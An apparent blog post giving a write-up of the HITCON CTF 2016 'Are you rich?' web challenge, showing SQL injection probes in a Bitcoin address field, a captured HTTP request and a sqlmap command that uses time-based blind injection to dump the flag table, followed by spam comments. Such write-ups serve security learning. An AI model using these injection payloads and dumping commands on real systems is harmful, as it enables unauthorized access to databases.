หน้าเว็บ

วันจันทร์ที่ 10 ตุลาคม พ.ศ. 2559

HITCON CTF 2016: Are you rich? (Web) Write-up


Descriptions:
Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed
Solution:

1. Access to website have 2 functions, Get our bitcoin address and Verify payment.


2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.


3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.

4. ' or 1=1# --- Found more than 1 records?


5. ' or 1=2# --- does not have enough confirmed money?


4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

6. Wait a several minute to retrieve a flag.


In Burp Suite (Union Based)


Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}

4 ความคิดเห็น:

  1. Excellent Blog! I would like to thank for the efforts you have made in writing this post. I am hoping the same best work from you in the future as well. I wanted to thank you for this websites! Thanks for sharing. Great websites!
    Data Science Training in Bangalore

    ตอบลบ
  2. I am a new user of this site, so here I saw several articles and posts published on this site, I am more interested in some of them, hope you will provide more information on these topics in your next articles.
    data analytics training in bangalore

    ตอบลบ
  3. Binance, BTCTurk, Paribu sahibi kim merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Sahibi





    Binance, BTCTurk, Paribu ne zaman kuruldu merak ediyorsanız tıklayın: Binance, BTCTurk, Paribu Ne Zaman Kuruldu





    Komisyon oranları için tıklayın: BtcTurk, Binance, Paribu Güvenilir mi? Komisyon Oranları





    Hangisi güvenilir merak ediyorsanız tıklayın: Btcturk, Binance, Paribu Güvenilir mi

    ตอบลบ